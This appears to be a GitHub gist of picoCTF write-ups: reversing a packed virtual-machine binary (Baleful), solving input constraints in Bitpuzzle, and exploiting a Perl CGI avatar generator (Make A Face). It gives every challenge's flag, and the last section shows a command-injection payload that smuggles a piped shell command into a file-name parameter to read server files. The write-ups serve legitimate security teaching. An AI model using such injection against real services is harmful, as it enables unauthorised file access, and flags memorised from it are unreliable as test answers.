Skip to content

Instantly share code, notes, and snippets.

@zwade
Last active October 30, 2015 15:18
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save zwade/f9dd1df1889e0e4b6dfd to your computer and use it in GitHub Desktop.
Save zwade/f9dd1df1889e0e4b6dfd to your computer and use it in GitHub Desktop.
Hello!

Baleful

Before we start, know that this problem take an inordinate amount of time, and I will be glossing over a lot of my process in solving this. I will hit the highlights, but as with many things like this, practice makes perfect. Lets see what they give us.

This program seems to be rather delightfully twisted! Can you get it to accept a password? We need it to get access to some Daedalus Corp files.

And the hint,

This program appears to be "packed." Fortunately, it's packed with a common packer, and no trickery was performed - so you should be able to just unpack it with the same packer.

The hint turns out to be pretty useless. We learn the same thing by running strings on it, getting

$Info: This file is packed with the UPX executable packer http://upx.sf.net $

Unpacking it is simply, just follow the url to upx and use it to unpack the binary. Now the fun begins.

Running baleful gives us the prompt,

Please enter your password: s00per_1337
Sorry, wrong password!

A simple binary reversing problem it would seem. Lets look at this in hopper.

Hmm, this is a pretty long one. We have a few methods at the beginning which seem to be primarily handlers for syscalls. Then we have one really long method which contains a 33 case switch statement on $eax. Now, after spending some time looking at the behavior of this code we notice a few things.

  • The switch statement is called repeatedly, without interruption.
  • The code is moving things around in memory, but ounly to a few specific data addresses.
  • It takes many many interations for it to even print out the introduction.

While this may not be obvious for some people, after a while you realize that what we're looking at is virtual machine. In other words, this program is interpreting ANOTHER program, and those 33 cases are each operation codes, or opcodes, similarly to MOV, or PUSH, and AND are x86 opcodes.

At this point, anyone with any experience in reversing should be on the floor weeping. But fear not, we can get through this. Let's use hopper to produce pseudo-code for one of the opcodes. Here is opcode 5.

loc_8048cf9: //case 4
    var_C = sign_extend_32(LOBYTE(*(int8_t *)(0x804c0c0 + var_34 + 0x1) & 0xff));
    var_24 = sign_extend_32(LOBYTE(*(int8_t *)(0x804c0c0 + var_34 + 0x2) & 0xff));
    eax = var_C;
    if (eax != 0x1) {
            if (eax <= 0x1) {
                    if (eax == 0x0) {
                            var_20 = *(ebp + sign_extend_32(LOBYTE(*(int8_t *)(0x804c0c0 + var_34 + 0x3) & 0xff)) * 0x4 + 0xffffff4c);
                            var_1C = *(ebp + sign_extend_32(LOBYTE(*(int8_t *)(0x804c0c0 + var_34 + 0x4) & 0xff)) * 0x4 + 0xffffff4c);
                            var_34 = var_34 + 0x5;
                    }
            }
            else {
                    if (eax != 0x2) {
                            if (eax == 0x4) {
                                    var_20 = *(0x804c0c0 + var_34 + 0x3);
                                    var_1C = *(0x804c0c0 + var_34 + 0x7);
                                    var_34 = var_34 + 0xb;
                            }
                    }
                    else {
                            var_20 = *(0x804c0c0 + var_34 + 0x3);
                            var_1C = *(ebp + sign_extend_32(LOBYTE(*(int8_t *)(0x804c0c0 + var_34 + 0x7) & 0xff)) * 0x4 + 0xffffff4c);
                            var_34 = var_34 + 0x8;
                    }
            }
    }
    else {
            var_20 = *(ebp + sign_extend_32(LOBYTE(*(int8_t *)(0x804c0c0 + var_34 + 0x3) & 0xff)) * 0x4 + 0xffffff4c);
            var_1C = *(0x804c0c0 + var_34 + 0x4);
            var_34 = var_34 + 0x8;
    }
    *(ebp + var_24 * 0x4 + 0xffffff4c) = var_20 * var_1C;
    var_28 = *(ebp + var_24 * 0x4 + 0xffffff4c);
    goto loc_8049c67;

This looks bad, but we can dissect it. First of all, its creating two variables that are offset from var_34. This indicates to us that var_34 is the instruction pointer, and those two variables are the arguments. Its then switching along the first one with three cases, var_C (== eax) == 0x0, 0x1, 0x2, 0x(>2). Again, if we stare at this long enough we realize that these are just the four different addressing modes this command supports. When you see something like var_20 = *(ebp + sign_extend_32(LOBYTE(*(int8_t *)(0x804c0c0 + var_34 + 0x3) & 0xff)) * 0x4 + 0xffffff4c);, what you are looking at is a relative address. It grabs the value out of that block of emulated ram, and uses it as the argument. The syntax var_20 = *(0x804c0c0 + var_34 + 0x3); is immediate addressing, meaning take the actual value located after the opcode. Then at the very end, we see it performing a multiply operation on the arguments, and then storing it into var_24.

At this point, I'm not going to go step by step for each of the opcodes, but rather list them hear using their traditional names.

00	8048A4D	nop
01	8048A56	ret
02	8048A8F	add
03	8048BC4	sub
04	8048CF9	signed mul
05	8048E2F	div
06	8048F91	xor
07	80495F5	neg
08	8049649	not
09	80490C6	and
0a	80491FB	or
0b	804959E	set if stack zero
0c	8049330	shl
0d	8049467	sar
0e	80496D1	load into v10, jump
0f	804969D	call
10	80496EC	jz
11	8049715	js
12	804973E	jle
13	8049767	jg
14	8049790	jns
15	80497B9	jnz
16	80497E2	test
17	80498F0	cmp
18	8049A02	mov
19	8049A86	inc
1a	8049AB9	dec
1b	8049AEC	pull from heap
1c	8049B43	place on heap
1d	8049C62	end/nop
1e	8049B92	push
1f	8049BF8	pop
20	8049C2E	syscall

You should, however, go through and parse each one from either assembly or pseudocode to understand how it works. Here are a few more notes for those who want to try the problem.

  • $ebp acts as the base pointer for the emulated RAM. This includes the emulated stack.
  • A variable in the form var_34 means $ebp-0x34
  • var_34 is the instruction pointer
  • var_38 is the stack pointer
  • The program itself's base location is 0x08040c0c0
  • Input length is 30 characters
  • Output is stderr not stdout

At this point however, I can't really help you anymore. Their are (as far as I know) two ways to go from here. Write your own disassembler that takes the program as input and outputs the computed assembly, or (as I did it), step through the program in GDB noting what it is doing, and then figuring out how it is checking the password. Either way, we eventually find it XORing two lists together (one that is four numbers long and therefore looping, and one that is the full length) and comparing the output to that. Ultimately we get the result packers_and_vms_and_xors_oh_my.

#Bitpuzzle

Let's see what they give us for this one,

This program seems to be a puzzle! Can you reverse-engineer it and find the solution to the puzzle?

and the hint,

You will probably want to disassemble this program and find the constraints on the input. Then, you might want a constraint solver!

Ok, so it looks like a generic reverse engineering problem, similar to ones you will see in many CTFs. It most likely takes an input, and if that input meets a certain list of conditions, then it is considered "correct". As with any problem like this, our first move should be to run it and see what it gives us.

$ ./bitpuzzle
Bet you can't solve my puzzle!
Give me a string.

No big surprises here, the only important thing to note is that it is reading input from stdin, not command line arguments. There are a couple routes to go from here, depending on whether or not you have access to a decompiler (or pseudo-code generator). For this problem (having already solved it, and knowing what works best) I will be using hopper, a mac app that has good disassembly and decompiling features. If you are on a PC, I reccommend Ida free or a similar program. For educational purposes, I'll do this without decompiling it. In practice, that is probably the easiest way to go about it.

Once we've loaded bitpuzzle into our disassembler of choice, we first need to find the main. Oddly enough, this file appears to have been stripped, so we don't even have a main method. If we look at the various functions found by hopper, we see a bunch of really short ones, and then a relatively longer one. It's probably safe to say that that is our main. Here is the first block of that method

080484e4         push       ebp                                
080484e5         mov        ebp, esp
080484e7         push       edi
080484e8         push       esi
080484e9         push       ebx
080484ea         and        esp, 0xfffffff0
080484ed         sub        esp, 0x120
080484f3         mov        eax, dword [gs:0x14]
080484f9         mov        dword [ss:esp+0x11c], eax
08048500         xor        eax, eax
08048502         lea        ebx, dword [ss:esp+0x1c]
08048506         mov        ecx, 0x40
0804850b         mov        edi, ebx
0804850d         rep stosd  
0804850f         mov        dword [ss:esp], 0x80487d0                           ; "Bet you can't solve my puzzle!", argument #1 for method puts@PLT
08048516         call       puts@PLT
0804851b         mov        dword [ss:esp], 0x8048840                           ; "Give me a string.", argument #1 for method puts@PLT
08048522         call       puts@PLT
08048527         mov        eax, dword [ds:stdin]                               ; stdin
0804852c         mov        dword [ss:esp+0x8], eax                             ; argument #3 for method fgets@PLT
08048530         mov        dword [ss:esp+0x4], 0x50                            ; argument #2 for method fgets@PLT
08048538         mov        dword [ss:esp], ebx                                 ; argument #1 for method fgets@PLT
0804853b         call       fgets@PLT
08048540         mov        edx, 0xffffffff
08048545         mov        edi, ebx
08048547         mov        eax, 0x0
0804854c         mov        ecx, edx
0804854e         repne scasb 
08048550         not        ecx
08048552         mov        byte [ss:esp+ecx+0x1a], 0x0
08048557         mov        edi, ebx
08048559         mov        ecx, edx
0804855b         repne scasb 
0804855d         cmp        ecx, 0xffffffde
08048560         je         0x8048582

Although it may look bad, this really isn't that important to us. All it's doing is setting up a few variables and preparing for the actual condition checking. The only thing we really want to look closely at is at the end, repne scasb; cmp ecx, 0xffffffde; je 0x8048582. These commands are collectively looping over the length of the input string, and scanning it to find the byte 0x0 which is stored in the $eax register. It then decrements $ecx, the counter for each letter it reaches. Once it's done, it checks to see if $ecx is equal to 0xfffffffde. That byte is a two's-complement number, so the easiest way to figure out how long our input string should be is by figuring out what that number is equal to. 0xffffffff - 0xffffffde = 33, so accounting for the fact that it is looping over 0x0 as well, we can safely say that the input string length is 32 bytes long.

Now for the first constraint.

08048582         mov        edx, dword [ss:esp+0x1c]     
08048586         mov        eax, dword [ss:esp+0x20]
0804858a         mov        edi, dword [ss:esp+0x24]
0804858e         lea        ebx, dword [ds:edi+eax]
08048591         mov        ecx, 0x0
08048596         cmp        ebx, 0xc0dcdfce
0804859c         jne        0x80485ad

The first thing it does is create a bunch of variables, more or less. It loads various parts of the input string ($esp) into the registers $edx, $eax and $edi and then sets $ebx to be the sum $edi+$eax. Looking ahead, we can see that these variables are being made frequently and each represent an int created with 4 letters of the input string. So if our input string is "Hello_World_My_Name_Is_Zach_Wade", then the first byte would be 0x48656c6c since "H" is 0x48, "e" is 0x65, and "l" is 0x6c. For convenience, in the future I will represent the different bytes by their index, so $1 would be the first byte, through $8 the last one. Using that formula, we see that $2+$3 ($ebx) needs to be equal to 0xc0dcdfce. That's good to know, but not immediately useful. Let's make a note of that.

Assuming they are equal, we then execute this code.

0804859e         lea        ecx, dword [ds:eax+edx]
080485a1         cmp        ecx, 0xd5d3dddc
080485a7         sete       cl
080485aa         movzx      ecx, cl

Aha, now we are checking to see if $2+$1 ($eax+$edx == $ecx) is equal to 0xd5d3dddc. If it is, then we set $ecx to be 0x1. After this we have,

080485ad         lea        esi, dword [ds:edx+edx*2]              
080485b0         lea        ebx, dword [ds:eax+eax*4]
080485b3         lea        ebx, dword [ds:ebx+esi]
080485b6         cmp        ebx, 0x404a7666
080485bc         mov        ebx, 0x0
080485c1         cmovne     ecx, ebx

Now we are creating two more variables, $esi = $1+$1*2 = $1*3 and $ebx = $2+$2*4 = $2*5. We then add them together to see if they are equal to 0x404a7666. However, if they are not, we unset $ecx. This behavior indicates that at then end of the program, it checks to see if $ecx still equals 1, and if it does, then we got the password right. Let's do one more constraint.

080485c4         mov        ebx, dword [ss:esp+0x28]
080485c8         xor        ebx, edx
080485ca         cmp        ebx, 0x18030607
080485d0         mov        ebx, 0x0
080485d5         cmovne     ecx, ebx

This one is fairly self-explanatory. It takes $4 and moves it into $ebx, and then xor's it with $1 ($edx) and checks to see if that is equal to 0x18030607. Once again, if it is not, then we unset $ecx, which we do not want. I won't go through the rest of the cases, but they are all similar to these, and you should be able to figure them out on your own. Here is the final list of constraints for the program.

$3 + $2           = 0xc0dcdfce
$1 + $2           = 0xd5d3dddc
 5 * $2 +  3 * $1 = 0x404a7666
$4 ^ $1           = 0x18030607
$1 & $4           = 0x666c6970
$5 * $2           = 0xb180902b
$5 * $3           = 0x3e436b5f
$5 +  2 * $6      = 0x5c483831
$6 & 0x70000000   = 0x70000000
$6 / $7           = 1
$6 % $7           = 0x0e000cec
 2 * $8 +  3 * $5 = 0x3726eb17
 7 * $8 +  4 * $3 = 0x8b0b922d
$4 +  3 * $8      = 0xb9cf9c91

Now, they suggest using a constraint solver. I could not find one that I liked, but we are men (or women)! We can solve this by hand. The best place to start ends up being with $1 and $2, specifically that $1 + $2 = 0xd5d3dddc and 5 * $2 + 3 * $1 = 0x404a7666. Using simple algebra techniques, we get that $1 = 0xd5d3dddc-$2 and thus that 2 * $2 = 0x404a7666 - 3 * 0xd5d3dddc. However, as we can see, this will give that $2 is negative. This is because the number may only take 4 bytes, and anything of a higher order than that is being truncated. Since we can guess that these numbers are in ascii range, we can assume that both numbers are approximately 0x70000000, so 5*0x70000000+3*0x70000000 ~= 0x320000000. As such, we should assume that 5 * $2 + 3 * $1 = 3404a7666. Taking this into account, we can use simple algebra to find that $1 = 0x766c6f73 and $2 = 0x5f676e69, which translates into the string vlos_gni. Unfortunately, this doesn't make much sense. The reason is, this program is interpreting the string in a different endian than we were expecting. As such, each byte in the integer is reversed, giving us the much more sensical string, solving_.

From here, the rest can be easily determined using similar techniques.

  • $3 = 0xc0dcdfce - $2
  • $4 = 0x18030607 ^ $1
  • $8 = ( 0x48b0b922d - 3 * $3 )/7
  • $5 = ( 0x23726eb17 - 2 * $8 )/3
  • $6 = ( 0x15c483831 - $5 )/2
  • $7 = $6 - 0x0e000cec*

Which, put all together, gives us the flag: solving_equations_is_lots_of_fun.

*If you are wondering how I got this equation, remember that when we see $6/$7 == 1, it is doing integer division and then rounding. The next equation, $6 % $7 == 0x0e000cec, tells us that the remainder after dividing $6 by $7 is 0x0e000cec, telling us that they are just that much apart.

Make A Face

Spoiler Alert, this is my favorite problem. Let's see what they give us

It looks like Daedalus is working on a new project to generate digital avatars for use online. After taking a look, at their site: http://makeaface.picoctf.com/ it seems like there is a pretty good chance the project isn't completed, and may have some bugs. This might be the break we've been looking for to get inside their network.

and the hint:

Making a face is cool, but making a shell is even better

Ok, looking at the website, we see this beauty:

It lets us adjust the slider to choose different features of the face, including the Head, Hair, Nose, Mouth, and Eyes. Once we have changed one of them, it shows a loading screen and then displays the generated face. Generally, with web problems like these, they are not black box, so we should check the source code for any information about how it is doing this. In this case, it shows us this source here:

#!/usr/bin/perl

use CGI;

$q = new CGI;
if (defined($q->param('Head'))) {
  print $q->header(-type=>'image/bmp');
  open(HEAD,"head".$q->param('Head'));
  open(HAIR,"hair".$q->param('Hair'));
  open(NOSE,"nose".$q->param('Nose'));
  open(MOUTH,"mouth".$q->param('Mouth'));
  open(EYES,"eyes".$q->param('Eyes'));

  while (read(HEAD,$headb,1)) {
    read(HAIR,$hairb,1);
    read(NOSE,$noseb,1);
    read(MOUTH,$mouthb,1);
    read(EYES,$eyesb,1);
    print (chr (ord($headb)&ord($hairb)&ord($noseb)&ord($mouthb)&ord($eyesb)));
  }
}
else {
  print $q->header;

  print $q->start_html(-title=>"Next Generation Avatar Creation",-script=>{'src'=>'/js.js'},-style=>{'src'=>'/css.css'});
  print $q->div(
   $q->h1("Avatar Generator"),
   $q->p("Are you sick and tired of stupid avatars on websites? Are you ready for the next generation of customizable, yet HAND MADE avatars? Then you have come to the right place!"),
   "<video><source src='https://zippy.gfycat.com/DesertedEasygoingArabianwildcat.webm'></source></video><canvas></canvas>",
   $q->start_form(-id=>"frm",-method=>"POOP",-action=>"#",-onchange=>"loadImage()"),
   $q->br(),
   $q->table(
    $q->Tr($q->td([$q->b("Head"),$q->input({-name=>"Head",-type=>'range',-min=>1,-max=>4})])),
    $q->Tr($q->td([$q->b("Hair"),$q->input({-name=>"Hair",-type=>'range',-min=>0,-max=>2})])),
    $q->Tr($q->td([$q->b("Nose"),$q->input({-name=>"Nose",-type=>'range',-min=>1,-max=>3})])),
    $q->Tr($q->td([$q->b("Mouth"),$q->input({-name=>"Mouth",-type=>'range',-min=>1,-max=>3})])),
    $q->Tr($q->td([$q->b("Eyes"),$q->input({-name=>"Eyes",-type=>'range',-min=>1,-max=>3})]))
   ),
   $q->end_form
  );
  open SELF, "index.cgi";
  print $q->comment("DEBUG SOURCE\n".do { local $/; <SELF> });
  print $q->end_html();
}

For the perl illiterate, this is the server code that is actually generating the webpage. What its doing, is first checking to see if the head param exists (i.e. if the page was called such as makeaface.picoctf.com?HEAD="anything), and if it does, then it begins to generate the image. It does this by reading, for each parameter, the file named "<param_name><param_value>". Thus, for the parameter HEAD="anything.jpg", it would load the image headanything.jpg. It then reads all of these and performs the bitwise AND (&) operator to all of them. Once its done, it returns the image as a bmp. The else clause of the if statement just renders the default webpage, so I won't go into detail explaining it. Now lets look at the image web requests nomenclature. Using chrome dev tool's network tab, we see the requests look like http://makeaface.picoctf.com/index.cgi?Head=3.bmp&Hair=1.bmp&Nose=2.bmp&Mouth=2.bmp&Eyes=2.bmp. Great, so the image format is along the lines of head1.bmp. Since this seems like the most probable vulnerability, it would be nice to have a function that would allow us to see the contents of the image in plaintext. So in the js console, lets add this function to the page

var get = function(arg) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET","http://makeaface.picoctf.com/index.cgi?Head="+arg+"&Hair=1.bmp&Nose=1.bmp&Mouth=1.bmp&Eyes=1.bmp",false)
  xhr.send()
  return xhr.response
}

This lets us manipulate the argument to the Head parameter and then see the response. If we try calling get('1.bmp'), we see a stream of useless unicode as the console tries to interpret the image. Thats along the lines of what we want. At this point, you would probably try a lot of trial and error, but as it turns out, unless you know the in-and-outs of perl, you still don't know enough to solve this problem. But, if we start looking for vulnerabilities in each of the functions being used, we find that open has a rather large one. The open function has a 'feature' that allows you to append a pipe ('|') to the filename and have the whole string be interpreted as a shell command. The output will then be sent to the later read function. This seems great at first, until we remember that it prepends the parameter name to whatever we send. At first this seems like a deal breaker, until we realize that one of those parameters is a unix command, HEAD. HEAD will print out the first few lines of whatever file is passed to it. So running get(" index.cgi |") will return.

" l >r()m('ead'));
  open(HAIR,"hair".$q->param('Hair'));
  open(NOSE,"nose".$q->param('Nose'));
"

This is great, but first of all, we are losing a lot off the top of the file from the AND operation, and we also don't know the name of the file that holds the key. We can try globbing get(" * |"), and we do get a peek at the css file, but not the flag one. However, it turns out that if we can offset the stream by a bit, then we can see the flag, so running get(" index.cgi * |") will have it first get index.cgi, which eats the ANDs, and then prints out

==> SECRET_KEY_2b609783951a8665d8c67d721b52b0f8 <==
why_did_we_stop_using_perl_again?

And there it is, we've solved Make A Face!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment